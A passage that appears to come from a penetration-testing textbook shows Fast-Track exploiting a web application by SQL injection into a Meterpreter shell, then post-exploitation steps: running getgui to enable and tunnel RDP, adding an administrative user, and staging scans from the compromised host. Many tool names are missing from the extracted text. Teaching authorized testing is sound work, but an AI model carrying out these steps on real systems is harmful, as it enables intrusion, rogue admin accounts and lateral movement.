background image

Simulated Penetration Test


[+] Prepping the payload for delivery. [+]
Sending chunk 1 of 8, this may take a bit...
Sending chunk 2 of 8, this may take a bit...

. . . SNIP . . .

Using H2B Bypass to convert our Payload to Binary..
Running cleanup before launching the payload....
[+] Launching the PAYLOAD!! This may take up to two or three minutes. [+]

This should look familiar. We’ve essentially attacked the web application 

through Fast-Track and exploited it via SQL injection attacks. We used the 


 stored procedure and the binary-to-hex conversion technique to 

present a full-fledged Meterpreter shell.

Post Exploitation

At this point, we should have a Meterpreter console running in the back-
ground within 


, so we can begin to scan the target’s subnet for other 

live systems. To do this, we’ll upload 


 to the target and run it from the 

Windows machine.

First, download 



 in an executable format and save 

it locally. We’ll be uploading this to our target. Next, we’ll connect to the 
target via Microsoft’s Remote Desktop Protocol (RDP), a built-in graphical 
remote administration protocol that lets you interact with the Windows 
Desktop as if you were sitting in front of the remote machine. After we’re 
connected with our Meterpreter session, we’ll use the 


 Meterpreter script 

to tunnel RDP back out to us over port 8080 and add a new administrative 
user to the system.

We enter 

rdesktop localhost:8080

 from Back|Track’s command line, so 

we can log into the system with the newly created user account. We then use 
Meterpreter to upload 


 to the target. Our goal is to install 


 on the 

compromised Windows target and use the system as a staging ground for 
further attacks. Conversely you could use 





 to port scan directly through Metasploit. The choice is a matter 

of personal preference and needs.

meterpreter > 

run getgui -e -f 8080

[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] Starting the port forwarding at local port 8080
[*] Local TCP relay created: <->
meterpreter >